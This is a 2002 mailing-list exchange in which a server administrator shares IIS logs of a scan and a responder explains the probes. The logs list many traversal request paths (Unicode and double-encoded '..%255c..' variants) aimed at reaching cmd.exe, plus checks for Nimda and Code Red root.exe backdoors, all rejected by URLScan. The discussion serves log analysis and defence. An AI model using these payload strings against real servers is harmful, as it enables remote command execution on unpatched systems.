> > > Hello all and forgive my ignorance in this area. Hello > > Below is a snippet from the logs. Can anyone tell by > looking at it: > > 1. What type of vulnerabilities were they looking for?
look downward > 2. Does the fact the it says <Rejected by urlscan> imply > that URLScan from M$ > is loaded. I didn't do this myself...thats why I'm curious. I don't know really too. > 3. What is the best course of action in regards to the > individual attempting > these activities? I traced the IP back to RoadRunner. > Should I call their > customer service and complain or am I just pissing in the > wind? you will piss in the wind i think ... > 4. I did run the IIS Lockdown wizard. Is that sufficient > for most types of > attacks? What other tools should I consider running? Don't hesitate to apply security paatch as soon as they are released ! > 2002-05-10 02:27:00 65.27.56.236 - 10.2.32.20 80 > GET /<Rejected-By-UrlScan> > ~/scripts/root.exe 404 123 - This test if your IIS has been infected by virus like nimbda or code red. root.exe is a copy of cmd.exe to give access to console via web. > 2002-05-10 02:27:00 65.27.56.236 - 10.2.32.20 80 > GET /<Rejected-By-UrlScan> > ~/MSADC/root.exe 404 123 - IDEM (i suppose) > 2002-05-10 02:27:01 65.27.56.236 - 10.2.32.20 80 > GET /<Rejected-By-UrlScan> > ~/c/winnt/system32/cmd.exe 404 123 - > 2002-05-10 02:27:01 65.27.56.236 - 10.2.32.20 80 > GET /<Rejected-By-UrlScan> > ~/d/winnt/system32/cmd.exe 404 123 - > 2002-05-10 02:27:01 65.27.56.236 - 10.2.32.20 80 IDEM > GET /<Rejected-By-UrlScan> > ~/scripts/..%255c../winnt/system32/cmd.exe 404 123 - This test a unicode vulnerability (the dot dot attack) scripts got the execute rights so they try to execute cmd.exe to access to the console via web :) > 2002-05-10 02:27:01 65.27.56.236 - 10.2.32.20 80 > GET /<Rejected-By-UrlScan> > ~/_vti_bin/..%255c../..%255c../..% > 255c../winnt/system32/cmd.exe 404 123 - IDEM > 2002-05-10 02:27:01 65.27.56.236 - 10.2.32.20 80 > GET /<Rejected-By-UrlScan> > ~/_mem_bin/..%255c../..%255c../..% > 255c../winnt/system32/cmd.exe 404 123 - IDEM > 2002-05-10 02:27:03 65.27.56.236 - 10.2.32.20 80 > GET /<Rejected-By-UrlScan> > ~/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1% > 1c../..%c1%1c../winnt/system32/cmd.exe IDEM > 404 123 - > 2002-05-10 02:27:03 65.27.56.236 - 10.2.32.20 80 > GET /<Rejected-By-UrlScan> > ~/scripts/..%c1%1c../winnt/system32/cmd.exe 404 123 - > 2002-05-10 02:27:04 65.27.56.236 - 10.2.32.20 80 > GET /<Rejected-By-UrlScan> > ~/scripts/..%c0%2f../winnt/system32/cmd.exe 404 123 - > 2002-05-10 02:27:04 65.27.56.236 - 10.2.32.20 80 > GET /<Rejected-By-UrlScan> > ~/scripts/..%c0%af../winnt/system32/cmd.exe 404 123 - > 2002-05-10 02:27:05 65.27.56.236 - 10.2.32.20 80 > GET /<Rejected-By-UrlScan> > ~/scripts/..%c1%9c../winnt/system32/cmd.exe 404 123 - > 2002-05-10 02:27:09 65.27.56.236 - 10.2.32.20 80 > GET /<Rejected-By-UrlScan> > ~/scripts/..%%35%63../winnt/system32/cmd.exe 404 123 - > 2002-05-10 02:27:11 65.27.56.236 - 10.2.32.20 80 > GET /<Rejected-By-UrlScan> > ~/scripts/..%%35c../winnt/system32/cmd.exe 404 123 - > 2002-05-10 02:27:12 65.27.56.236 - 10.2.32.20 80 > GET /<Rejected-By-UrlScan> > ~/scripts/..%25%35%63../winnt/system32/cmd.exe 404 123 - > 2002-05-10 02:27:12 65.27.56.236 - 10.2.32.20 80 > GET /<Rejected-By-UrlScan> > ~/scripts/..%252f../winnt/system32/cmd.exe 404 123 - IDEM for all > > Thanks so much for this great list. > > Craig Brauckmiller >